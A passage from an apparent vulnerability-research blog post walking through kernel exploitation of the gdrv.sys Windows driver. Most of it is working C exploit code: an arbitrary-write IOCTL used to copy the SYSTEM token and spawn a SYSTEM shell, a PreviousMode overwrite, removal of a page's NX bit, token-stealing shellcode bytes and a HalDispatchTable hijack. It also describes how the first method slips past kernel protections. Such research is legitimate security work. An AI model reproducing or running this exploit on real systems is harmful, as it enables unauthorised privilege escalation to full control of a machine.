    //ULONG_PTR SystemTokenAddress = (ULONG_PTR)SystemProcessObjectAddress + 0x4b8;
    //ULONG_PTR  CurrentProcessTokenAddress = (ULONG_PTR)CurrentProcessObjectAddress + 0x4b8;

    //printf("[*] SYSTEM Token Virtual Address: 0x%p\n", SystemTokenAddress);
    //printf("[*] Local Process Token Virtual Address: 0x%p\n", CurrentProcessTokenAddress);


    ULONG_PTR* InputBuffer = (ULONG_PTR*)calloc(1, 0x40);      // 8 bytes virtual address to be translated
    ULONG_PTR* OutputBuffer = (ULONG_PTR*)calloc(1, 0x40);
    printf("[*] User-Mode Virtual Address of InputBuffer: 0x%p\n", InputBuffer);

    DWORD AddressSize = 8;

    // 5th byte is being truncated because in GetPhysicalAddress()'s IOCTL because:
    // Irp->IoStatus.Information = 4 bytes
    printf("[*] SYSTEM Token Physical Address: 0x%p\n", SystemTokenPhysicalAddress);

    RtlCopyMemory((BYTE*)InputBuffer + 8, &SystemTokenPhysicalAddress, 8);
    RtlCopyMemory((BYTE*)InputBuffer + 20, &AddressSize, 4);
    RtlCopyMemory((BYTE*)InputBuffer + 24, &CurrentProcessTokenAddress, 8);

    printf("InputBuffer[0]: %p\n", InputBuffer[0]);
    printf("InputBuffer[1]: %p\n", InputBuffer[1]);
    printf("InputBuffer[2]: %p\n", InputBuffer[2]);
    printf("InputBuffer[3]: %p\n", InputBuffer[3]);
    printf("InputBuffer[4]: %p\n", InputBuffer[4]);

    //DebugBreak();

    printf("[*] Debug: getting into DeviceIoControl() request\n");
    DWORD BytesReturned = 0;
    //DebugBreak();
    if (DeviceIoControl(hDevice, IOCTL_MmMapIoSpace, InputBuffer, 0x40, OutputBuffer, 0x40, &BytesReturned, nullptr))
        printf("[+] Exploit() DeviceIoControl (0x%x) executed successfully!\n", IOCTL_MmMapIoSpace);
    DebugBreak();

    CloseHandle(hDevice);
    free(InputBuffer);
    free(OutputBuffer);
}

Let’s go over the function.

The “Exploit()” function takes 2 arguments:

SystemTokenPhysicalAddress (Physical Address)
CurrentProcessTokenAddress (Virtual Address)

The function starts by opening a handle to the \\\\.\\GIO device object, which is managed under the gdrv.sys driver we’re exploiting. Next, both “input buffer” and “output buffer” are being allocated.

The “InputBuffer”, which in kernel mode we’ll be the SystemBuffer is going to be constructed in the following way:

SystemBuffer[8–16] - going to hold the SYSTEM process token physical address.
SystemBuffer[20–24] - going to hold the number of bytes that will be mapped into kernel space’s virtual memory.
SystemBuffer[24–32] - going to hold the virtual address of the current process’ token, which is also the destination in the memmove() function. Next, a DeviceIoControl() is called, invoking an IRP which gets into the IOCTL.

Let’s view the execution in WinDbg. First, we’ll set a breakpoint on the base address of MmMapIoSpace_vulnerable() function:

  
bp gdrv+0x1570

Next, we’ll continue execution and execute the “gdrv_exploit.exe” client code until we’ll reach the breakpoint:

Now that we hit the breakpoint, let’s view the SystemBuffer field in the IRP and verify that it was crafted correctly:

  
dt nt!_IRP @rdx AssociatedIrp.

We can see the Physical Address transferred, we can see the NumberOfBytes field (which is 8) shown in the buffer, and we can also see the virtual address of our local process’ Token field.

Now, let’s continue execution by executing the “g” command and see what happens:

Unfortunately, we get a system crash. Executing !analyze -v to get more information about the crash:

We can see that Arg1 holds a truncated DWORD of our process’ token virtual address. Let’s take a second look at the memmove() function call:

We can see that the destination argument in the function is treated as a pointer to an integer (4 bytes) and is being dereferenced and truncated into an integer instead of an 8 byte pointer, which makes it not exploitable.

Exploit Development - Attempt 2 - Arbitrary Write (Token Stealing)

Let’s now go over into a reversed function called ArbitraryWrite_vulnerable():

We’ve already reversed it, but as a reminder the function parses the SystemBuffer into 3 parts:

Destination address
Source address
Number of bytes to copy

This function can be leveraged into an “Arbitrary Write” primitive that will open for us many possibilities to escalate our privileges and more.

Let’s view an implementation of a function that interacts with IOCTL and invokes the “Arbitrary Write” primitive:

  
VOID ArbitraryWrite(ULONG_PTR SrcAddress, ULONG_PTR DstAddress, ULONG_PTR Size)
{
    printf("[*] In ArbitraryWrite()...\nPress Enter to continue...");
    getchar();

    //Name of the device might be different!!
    HANDLE hDevice = CreateFile(L"\\\\.\\GIO", GENERIC_READ | GENERIC_WRITE, 0, nullptr, OPEN_EXISTING, 0, nullptr);
    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("[-] Handle to the device couldn't be created: %u\n", GetLastError());
        return;
    }

    printf("[+] Handle to device \\\\.\\GIO was opened successfully!!\n");

    printf("[*] SrcAddress: 0x%p\n", SrcAddress);
    printf("[*] DstAddress: 0x%p\n", DstAddress);
    printf("[*] Size: 0x%p\n", Size);

    ULONG_PTR* InputBuffer = (ULONG_PTR*)calloc(1, 24);

    RtlCopyMemory((BYTE*)InputBuffer, &DstAddress, 8);
    RtlCopyMemory((BYTE*)InputBuffer + 8, &SrcAddress, 8);
    RtlCopyMemory((BYTE*)InputBuffer + 16, &Size, 4);

    printf("[*] InputBuffer[0]: %p\n", InputBuffer[0]);
    printf("[*] InputBuffer[1]: %p\n", InputBuffer[1]);
    printf("[*] InputBuffer[2]: %p\n", InputBuffer[2]);

    DWORD BytesReturned = 0;
    if (DeviceIoControl(hDevice, IOCTL_ArbitraryWrite, InputBuffer, 24, nullptr, 0, &BytesReturned, nullptr))
        printf("[+] DeviceIoControl() on 0x%x executed successfully!\n", IOCTL_ArbitraryWrite);
    else
        printf("[-] DeviceIoControl() on 0x%x failed with GetLastError(): %u\n", GetLastError());

    free(InputBuffer);
    CloseHandle(hDevice);
}

The function takes 3 arguments:

Destination Address
Source Address
Number of bytes to copy

The function starts with opening a handle to the \\\\.\\GIO device object, and allocates an InputBuffer that’s going to be served as the SystemBuffer at kernel mode execution and is structured in the following way:

SystemBuffer[0–8] holds the “Destination Address” (QWORD)
SystemBuffer[8–16] holds the “Source Address” (QWORD)
SystemBuffer[16–20] holds the number of bytes to copy (DWORD)

Then, the DeviceIoControl() is invoked, which triggers IOCTL that triggers the “ArbitraryWrite()” function primitive.

With a potential “Arbitrary Write” primitive at hand, let’s think of the following attack vector: With the ability to leak the virtual address of the SYSTEM process’ token field, and the virtual address of our local process token, we can set the “DestinationAddress” argument to be the local process token address, and the “SourceAddress” to be SYSTEM process token field address. So when the primitive is invoked, the token of the SYSTEM process will be copied into our own local process token field and will grant us execution as NT AUTHORITY/SYSTEM.

Let’s modify the main() function and trigger the function:

  
int main()
{
    printf("[*] Starting execution...\n");

    PVOID CurrentProcessObjectAddress = LeakProcessAddress(GetCurrentProcessId());
    PVOID SystemProcessObjectAddress = LeakProcessAddress((DWORD)4); // SYSTEM's PID = 4

    printf("[*] Current Process _EPROCESS (Virtual) Address: 0x%p\n", CurrentProcessObjectAddress);
    printf("[*] SYSTEM Process _EPROCESS (Virtual) Address: 0x%p\n", SystemProcessObjectAddress);

    ULONG_PTR SystemTokenAddress = (ULONG_PTR)SystemProcessObjectAddress + 0x4b8;
    ULONG_PTR CurrentProcessTokenAddress = (ULONG_PTR)CurrentProcessObjectAddress + 0x4b8;
    ULONG_PTR Size = 8;
    printf("[*] SYSTEM Token Address: 0x%p\n", SystemTokenAddress);
    printf("[*] Local Process Token Address: 0x%p\n", CurrentProcessTokenAddress);

    ArbitraryWrite(SystemTokenAddress, CurrentProcessTokenAddress, Size);
    printf("[+] Successfully overwritten Local Process Token with SYSTEM process Token!!\n");
    printf("[+] Press Enter to get SYSTEM shell...\n");
    getchar();
    system("cmd.exe");

    return 0;
}

The main() function now triggers the “ArbitraryWrite()” and executes system(cmd.exe) to obtain a privileged shell.

Let’s execute the modified code and see if the SYSTEM token is copied into our local process token and we obtain a a privileged shell:

Viewing both SYSTEM process’ token and local process token:

  
dq ffff9d8d2dedd080+4b8 L1

dq ffff9d8d26498040+4b8 L1

We can see that the tokens are the same (above is the SYSTEM token address location, and at the bottom is local process token location). The reason for the last 4 bytes being different has no meaning for us, it’s the same token.

Let’s now continue execution and see if we get a privileged shell:

We successfully got a shell as NT AUTHORITY\SYSTEM.

This is a very basic and evasive way to exploit “Arbitrary Write” without invoking any modern kernel protection mechanisms:

KCFG (Kernel Control Flow Guard) won’t be invoked since we don’t attempt to perform any indirect function call.
SMEP & SMAP (Supervisor Mode Execution/ Supervisor Mode Access Prevention) won’t be invoked here because we don’t perform any direct cross ring activity (no attempt to execute or access pages from across rings).
Intel CET (Intel Control Flow Enforcement Technology) won’t also be invoked, since we don’t overwrite any return address pointer that Intel CET’s shadow stack will crash on.
SLAT/EPT (Second Layer Address Translation / Extended Page Translation) won’t also be invoked here since there is no attempt to execute a page in memory that is considered to be an executable page that’s going to require a second address translation in hypervisor space.

Exploit Development - Attempt 3 - Shellcode Execution

The next thing I want to show is a longer and more educative way that will be detected by KCFG and EPT but can potentially be bypassed.

What we’re going to do is to write a “Token Stealing” shellcode at a code cave that resides at KUSER_SHARED_DATA+0x800, modify the PTE of this location to be executable in memory.

To make our “Arbitrary Write” more comfortable and leverage it into also an “Arbitrary Read” primitive which we’ll need soon, we’re going to overwrite a field called PreviousMode on our _ETHREAD object structure:

  
CHAR PreviousMode //0x232

This field is a byte-sized field that resides at offset 0x232 from the _ETHREAD base address. This field is used by the kernel at reading and writing memory-related syscalls (NtReadVirtualMemory()/NtWriteVirtualMemory()) and it only has 2 values, 1 if the previous mode of the thread was user mode, which means that the request comes from user mode, or 0, which means that the thread is a kernel-mode thread and the request is a privileged kernel-mode request.

Let’s view the implementation for NtReadVirtualMemory() implementation in IDA:

We can see that there is a call to MiReadWriteVirtualMemory(), which is an internal Memory Manager function that is being used both in NtReadVirtualMemory() and NtWriteVirtualMemory().

Since the pseudocode view isn’t clear in IDA, we’ll reverse the assembly of the MiReadWriteVirtualMemory() function:

The r14 register gets the gs:188h (which is _KPCR+0x188h) value stored within it. This field is the _KTHREAD field structure where PreviousMode resides (the _KTHREAD is the first structure in the _ETHREAD object structure).

Next, the instruction movzx eax, byte ptr [r14+232h] which takes the byte-sized field of PreviousMode and saves it into the “eax” register.

Then, a test al, al instruction is executed, which performs a logical AND operation on the PreviousMode value to check whether it’s 1 or 0. If the value is 0, it means that the request is a kernel-mode request and passes many of the address sanitization checks performed by the kernel when executing NtReadVirtualMemory() or NtWriteVirtualMemory() operations.

Overwriting PreviousMode will allow us to execute NtReadVirtualMemory() and NtWriteVirtualMemory() on kernel addresses from our user-mode client program.

Since our ArbitraryWrite() writes data from a kernel mode address to another kernel mode address, we’ll need to find a location that will always be 0 in memory, set the address of this location into the “SourceAddress” field, and set our current thread’s PreviousMode address as our “DestinationAddress” field.

The “SourceAddress” we’re going to be using is the base address for where our shellcode will reside, which is currently zeroed out.

Let’s view an implementation of overwriting PreviousMode on our current thread:

  
int main()
{
    printf("[*] Starting execution...\n");
    NTSTATUS status = 0;
    
    PVOID CurrentProcessObjectAddress = LeakProcessAddress(GetCurrentProcessId());
    PVOID SystemProcessObjectAddress = LeakProcessAddress((DWORD)4); // SYSTEM's PID = 4
    ULONG_PTR shellcode_address = 0xfffff78000000800;

    PVOID CurrentThreadObjectAddress = LeakKthreadAddress(GetCurrentProcessId(), GetCurrentThreadId());
    printf("[*] Current _ETHREAD object address: 0x%p\n", CurrentThreadObjectAddress);

    printf("[*] Press enter to overwrite PreivousMode...\n");
    getchar();
    printf("[*] Overwriting PreviousMode on current thread...\n");
    ArbitraryWrite(shellcode_address, (ULONG_PTR)((ULONG_PTR)CurrentThreadObjectAddress + 0x232), (ULONG_PTR)1);
    printf("[+] PreviousMode was successfully overwritten!...\n");

The LeakKthreadAddress() helper function is very similar to the LeakProcessAddress() helper function and looks like this:

This function takes 2 arguments:

PID
TID

and returns the _KTHREAD address of the target thread.

Let’s now review the ArbitraryWrite() we wrote previously:

Source Address is set to the empty code cave that will soon be filled with our shellcode and resides at “KUSER_SHARED_DATA+0x800” which is a fixed address at 0xfffff78000000800. Destination Address is the destination of our PreviousMode Size is 1 byte, since PreviousMode is 1 byte. Let’s now give it a try and execute it:

We can see that our _ETHREAD object address is at 0xFFFF9601CD281080

Before overwriting “PreviousMode”:

  
db 0xFFFF9601CD281080+0x232 L1

We can see that the PreviousMode is set to 1 before execution. Let’s continue execution and see if it was overwritten:

We successfully overwrote PreviousMode for our current executing thread:

  
db 0xFFFF9601CD281080+0x232 L1

Now we can execute NtReadVirtualMemory() and NtWriteVirtualMemory() from user mode to kernel space.

The next thing we’re going to do before writing the shellcode is setting the appropriate permissions of the PTE (Page Table Entry) of the page where the shellcode is going to reside.

For that, we’re going to implement the following helper function called ReadPTE():

  
PVOID ReadPTE(HANDLE hProcess, ULONG_PTR Address)
{
    //BaseAddress + 0x2DDF70 + 0x13) == nt!MiGetPteAddress+0x13 which holds the PTEBase address
    //NOTE: The offset above is different between OSes
    
    ULONG_PTR PteBase = 0;
    ULONG_PTR Base = LeakNtoskrnlBaseAddress();
    ULONG_PTR pPteBase = Base + 0x2DDF70 + 0x13;
 
    NTSTATUS status = NtReadVirtualMemory(hProcess, (PVOID)pPteBase, (PVOID)&PteBase, 8, nullptr);
    if (!NT_SUCCESS(status))
    {
        printf("[-] Error in reading nt!MiGetPteAddress+0x13 -> NTSTATUS: 0x%x\n", status);
        //return (PVOID)PteBase;
    }

    printf("[+] `PTE` Base (nt!MiGetPteAddress+0x13): 0x%p\n", PteBase);

    // Need to modify KUSER_SHARED_DATA+0x800 `PTE` values and make the page executable!!!
    // implelment nt!MiGetPteAddress and get the `PTE` base from nt!MiGetPteAddress+0x13 

    // Implementing nt!MiGetPteAddress:
    ULONG_PTR PTEAddress = Address >> 9;
    PTEAddress &= 0x7FFFFFFFF8;
    PTEAddress += PteBase;

    return (PVOID)PTEAddress;
}

The function takes 2 arguments:

HANDLE hProcess - A handle to the SYSTEM kernel process (PID: 4)
ULONG Address - The address to resolve its Page Table Entry address.

The function is a C implementation of the nt!MiGetPteAddress from the kernel:

The ReadPTE() function starts by reading the PTE Base resides at nt!MiGetPteAddress+0x13, and this address is stored in the “pPteBase”. The reading from kernel memory is performed using NtReadVirtualMemory() and saves the result into the PteBase variable.

Next, a few logical operations are performed that are taken from the nt!MiGetPteAddress function shown above that calculates the PTE address of the given address and returns it.

Let’s view the next phase of the main() function:

  
    /*
    When _ETHREAD.PreviousMode field is overwritten, the kernel sees this thread as a "Kernel Thread"
    in read/write operations. This means that both reading and writing is available on kernel space;
    */
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 4); // Opening a handle to SYSTEM (4) process
    if (hProcess == INVALID_HANDLE_VALUE)
    {
        printf("[-] Error opening handle to SYSTEM... GetLastError(): %u\n", GetLastError());
        return -1;
    }
    ULONG_PTR PTEAddress = (ULONG_PTR)ReadPTE(hProcess, shellcode_address);
    printf("[+] KUSER_SHARED_DATA+0x800 `PTE` address: 0x%p\n", PTEAddress);

    // Reading retrieved `PTE` Address' permission set
    ULONG_PTR PtePermissionSet = 0;
    status = NtReadVirtualMemory(hProcess, (PVOID)PTEAddress, (PVOID)&PtePermissionSet, 8, nullptr);
    if (!NT_SUCCESS(status))
    {
        printf("[-] Error in reading KUSER_SHARED_DATA+0x800 `PTE` | NTSTATUS: 0x%x\n", status);
        return -1;
    }
    printf("[*] KUSER_SHARED_DATA+0x800 `PTE` Permission set: %p\n", PtePermissionSet);

The main() function continues by opening a handle to the SYSTEM process, calling the ReadPTE() with the first argument being the SYSTEM process handle and second handle being the address where our shellcode is going to reside and executes the NtReadVirtualMemory() to read the PTE permissions data.

Let’s execute the code:

We can see that we’ve successfully read the PTE address of our shellcode page, which is 0xFFFFC6FBC0000000. Let’s confirm its validity in WinDbg:

  
dt nt!_MMPTE_HARDWARE 0xFFFFC6FBC0000000 

Viewing the “_MMPTE_HARDWARE” structure with the target PTE set, we can understand that the target page is:

Readable
Writable
Not Executable

With this permission set in the PTE, if we attempt to write the shellcode and execute it, we’ll receive a Blue Screen, that’s because we attempted to execute code in a non-executable page.

With that understanding, we know that the next step is to flip the PTE’s “NoExecute” bit to 0, which makes the target PTE executable. We’re going to overwrite it by XORing the PTE permission set (which is currently 0x8000000004A27963) with 0x8000000000000000, the “8” represents the “NX” (NoExecute) bit enabled, so XORing the 2 values will remove it. To reflect it in the kernel, we’re going to write the modified value to the PTE using the NtWriteVirtualMemory().

All of these actions are happening in the main() function in the following way:

  
    PtePermissionSet ^= 0x8000000000000000; // Removing NX bit from PTE...
    printf("[*] KUSER_SHARED_DATA+0x800 Modified `PTE` Permissions set: %p\n", PtePermissionSet);

    status = NtWriteVirtualMemory(hProcess, (PVOID)PTEAddress, &PtePermissionSet, 8, nullptr);
    if (!NT_SUCCESS(status))
    {
        printf("[-] Error in writing KUSER_SHARED_DATA+0x800 `PTE` | NTSTATUS: 0x%x\n", status);
        return -1;
    }

Let’s now execute the program once again and see the NX bit being removed from our target PTE:

Let’s verify it in WinDbg:

  
dq nt!_MMPTE_HARDWARE 0xFFFFC6FBC0000000

As we can see, we successfully overwrote the PTE and made the target page where our shellcode will reside also executable.

Now, the next thing we’re going to do is to write the shellcode to “KUSER_SHARED_DATA+0x800”. This is the “Token Stealing” shellcode and the offsets within it are relative to my current Windows 10 I’m demonstrating with:

  
    /*
    *shellcode itself*
    "\x65\x48\x8B\x04\x25\x88\x01\x00\x00"              # mov rax,[gs:0x188]  ; Current thread (KTHREAD)
    "\x48\x8B\x80\xB8\x00\x00\x00"                      # mov rax,[rax+0xb8]  ; Current process (EPROCESS)
    "\x48\x89\xC3"                                      # mov rbx,rax         ; Copy current process to rbx
    "\x48\x8B\x9B\xE8\x02\x00\x00"                      # mov rbx,[rbx+0x448] ; ActiveProcessLinks
    "\x48\x81\xEB\xE8\x02\x00\x00"                      # sub rbx,0x2e8       ; Go back to current process
    "\x48\x8B\x8B\x40\x04\x00\x00"                      # mov rcx,[rbx+0x440] ; UniqueProcessId (PID)
    "\x48\x83\xF9\x04"                                  # cmp rcx,byte +0x4   ; Compare PID to SYSTEM PID
    "\x75\xE5"                                          # jnz 0x13            ; Loop until SYSTEM PID is found
    "\x48\x8B\x8B\xB8\x04\x00\x00"                      # mov rcx,[rbx+0x4B8] ; SYSTEM token is @ offset _EPROCESS + 0x4B8
    "\x48\x89\x88\xB8\x04\x00\x00"                      # mov [rax+0x4B8],rcx ; Copy SYSTEM token to current process
    "\xC3"                                              # ret                 ; Done!
    */

    char payload[] =
        "\x65\x48\x8B\x04\x25\x88\x01\x00\x00"//              # mov rax, [gs:0x188]; Current thread(KTHREAD)
        "\x48\x8B\x80\xB8\x00\x00\x00"        //              # mov rax, [rax + 0xb8]; Current process(EPROCESS)
        "\x48\x89\xC3"                        //              # mov rbx, rax; Copy current process to rbx
        "\x48\x8B\x9B\x48\x04\x00\x00"        //              # mov rbx, [rbx + 0x448]; ActiveProcessLinks
        "\x48\x81\xEB\x48\x04\x00\x00"        //              # sub rbx, 0x448; Go back to current process
        "\x48\x8B\x8B\x40\x04\x00\x00"        //              # mov rcx, [rbx + 0x440]; UniqueProcessId(PID)
        "\x48\x83\xF9\x04"                    //              # cmp rcx, byte + 0x4; Compare PID to SYSTEM PID
        "\x75\xE5"                            //              # jnz 0x13; Loop until SYSTEM PID is found
        "\x48\x8B\x8B\xB8\x04\x00\x00"        //              # mov rcx, [rbx + 0x4B8]; SYSTEM token is @ offset _EPROCESS + 0x4B8
        "\x48\x89\x88\xB8\x04\x00\x00"        //              # mov[rax + 0x4B8], rcx; Copy SYSTEM token to current process
        "\xC3";

    printf("\n");

The shellcode parses the “KPCR” to get the our process _EPROCESS structure, iterates over a linked list of all the _EPROCESS structures on the SYSTEM through a field called “ActiveProcessLinks”, find the _EPROCESS address of the SYSTEM process, and copies the SYSTEM process token to our local process, giving us SYSTEM permissions on our process.

We’re going to write it through the following code in the main() function:

  
    // Writing shellcode
    printf("[*] Writing Token Stealing shellcode...\n");
    status = NtWriteVirtualMemory(hProcess, (PVOID)shellcode_address, (PVOID)&payload, sizeof(payload), nullptr);
    if (!NT_SUCCESS(status))
    {
        printf("[-] Error writing shellcode into KUSER_SHARED_DATA+0x800 `PTE` | NTSTATUS: 0x%x\n", status);
        return -1;
    }

Let’s execute the program and validate that the shellcode was successfully written to KUSER_SHARED_DATA+0x800:

uf 0xfffff78000000800

As we can see, the “Token Stealing” shellcode was successfully written to our code cave.

The next thing is to find a way to trigger our shellcode. We’re going to do that by overwriting nt!HalDispatchTable+0x8 with our shellcode address and execute from our client program the “NtQueryIntervalProfile()” function. The “HAL” (Hardware Abstraction Layer) is a low level layer that provides a uniform set of functionalities that allows interactions of hardware components with the operating system. We’re going to temporarily overwrite a function pointer within the nt!HalDispatchTable with the shellcode address, and invoke it using “NtQueryIntervalProfile()”. After it’s being executed, we’ll return the original function pointer to its original location.

This is how it’s performed in the main() function:

  
    ULONG_PTR HalDispatchTable = g_BaseAddress + 0xc00a60;
    printf("[+] nt!HalDispatchTable base address: 0x%p\n", HalDispatchTable);

    ULONG_PTR OriginalNtQueryIntervalProfileAddress;
    status = NtReadVirtualMemory(hProcess, (PVOID)((ULONG_PTR)HalDispatchTable + 0x8), &OriginalNtQueryIntervalProfileAddress, 8, nullptr);
    if (!NT_SUCCESS(status))
    {
        printf("[-] Error reading original HalDispatchTable+0x8 | NTSTATUS: 0x%x\n", status);
        return -1;
    }

    printf("[*] Original nt!HalDispatchTable+0x8 address: 0x%p\n", OriginalNtQueryIntervalProfileAddress);
    printf("[+] Press Enter to overwrite nt!HalDispatchTable+0x8...");
    getchar();

    status = NtWriteVirtualMemory(hProcess, (PVOID)((ULONG_PTR)HalDispatchTable+0x8), (PVOID)&shellcode_address, 8, nullptr);
    if (!NT_SUCCESS(status))
    {
        printf("[-] Error writing shellcode into KUSER_SHARED_DATA+0x800 `PTE` | NTSTATUS: 0x%x\n", status);
        return -1;
    }

    printf("[+] nt!HalDispatchTable+0x8 was overwritten successfully!...\n");
 
    ULONG Interval = 0;
    status = NtQueryIntervalProfile(0x1234, &Interval); //Invoke the shellcode execution
    if(!NT_SUCCESS(status))
    {
        printf("[-] Error executing NtQueryIntervalProfile() - NTSTATUS 0x%x\n", status);
        return status;
    }
    
    printf("[+] Shellcode Executed - Current process token was overwritten with SYSTEM token!\n");
    
    // Returning original address in nt!HalDispatchTable+0x8
    status = NtWriteVirtualMemory(hProcess, (PVOID)((ULONG_PTR)HalDispatchTable + 0x8), (PVOID)&OriginalNtQueryIntervalProfileAddress, 8, nullptr);
    if (!NT_SUCCESS(status))
    {
        printf("[-] Error in returning original address in nt!HalDispatchTable+0x8 | NTSTATUS: 0x%x\n", status);
        return -1;
    }

First, we get the offset to the nt!HalDispatchTable, which is different between OS versions, Next, we read the original function pointer value from nt!HalDispatchTable+0x8. We do that, so we can recover it after the shellcode is executed.

After having the original function pointer, we overwrite it with the shellcode address using NtWriteVirtualMemory().

Now, to invoke the shellcode, we’re going to execute the NtQueryIntervalProfile(), which originally should call the original function pointer which is nt!HaliQuerySystemInformation, but now is our shellcode. After invoking the shellcode, we’ll execute NtWriteVirtualMemory() once again to return the nt!HaliQuerySystemInformation to nt!HalDispatchTable+0x8.

Let’s execute the exploit:

Viewing the nt!HalDispatchTable+0x8 before modification:

  
dps nt!HalDispatchTable L2

Let’s continue execution:

Now, after the shellcode was executed, let’s validate that the SYSTEM token was successfully copied to our current process:

The first value is the SYSTEM process token address, and the second value is our local process token address. This confirms that the token was copied successfully and now we’re a privileged process.

The only thing that we now need to do is to invoke a shell. Since PreviousMode is overwritten on our current thread, it will be problematic for us to directly execute “system(“cmd.exe”)” and get a shell, so we’re going to create a different thread that will execute this command:

  
    printf("Press Enter to get a SYSTEM shell...\n");
    getchar();

    DWORD ThreadID = 0;
    char command[] = "cmd.exe";
    HANDLE hThread = CreateThread(nullptr, 1024, (LPTHREAD_START_ROUTINE)system, &command, 0, &ThreadID);

    WaitForSingleObject(hThread, INFINITE);
    CloseHandle(hProcess);
    
    return 0;
}

Let’s now receive a shell…

Let’s summarize what we did:

Reversing and analyzing different IOCTLs in the driver in an attempt to find vulnerabilities.
Found 2 potential vulnerabilities, one which should allow us to exploit memory mapping vulnerability and overwrite our token with the SYSTEM’s token, and another exploit which grants us an “Arbitrary Write” primitive.
Next, we encountered a problem while attempting to exploit the memory mapping vulnerability, so we went directly into the “Arbitrary Write” primitive.
We exploited the “Arbitrary Write” primitive in 2 ways:
- Through obtaining the SYSTEM process token address and our local process token address and directly overwriting our token with the process token.
- Through overwriting PreviousMode of our current thread, modifying the code cave’s Page Table Entry to also be executable, wrote our shellcode into the code cave, and executed the shellcode by overwriting “nt!HalDispatchTable+0x8” with our shellcode address.

Note that the second exploitation method is going to be detected by KCFG (Kernel Control Flow Guard) and VBS’s (Virtualization Based Security) SLAT (Second Layer Address Translation) and I’ll explain.

The reason KCFG will detect the second exploitation method is because overwriting the nt!HalDispatchTable+0x8 and invoking it is considered an indirect function call that will be checked by KCFG, and when it will compare the modified target function pointer with KCFG’s original function pointer it will detect a mismatch and will crash the system.

The reason why “VBS” will detect it through “SLAT” is because we attempt to execute code in a page that isn’t originally considered to be executable, so the address translation in the kernel will go fluently, since we changed the PTE to be executable, but at the second translation at the hypervisor level at ring -1, the PTE isn’t executable, so it will detect a malicious PTE modification and crash the system.

If you’re not familiar with these modern kernel exploitation protection mechanisms, I highly recommend you to read about them in books like “Windows Internals 2nd Edition” and “Intel 64 and IA-32 Architectures Software Developer Manuals”.

The exploit code we wrote is fully available on my github page:

https://github.com/AmitMoshel1/gdrv_sys_exploit/

Vulnerability-Research

This post is licensed under CC BY 4.0 by the author.

Reversing gdrv.sys - Vulnerable Driver

Exploit Development - Attempt 1 - Arbitrary Memory Mapping

Exploit Development - Attempt 2 - Arbitrary Write (Token Stealing)

Exploit Development - Attempt 3 - Shellcode Execution

Trending Tags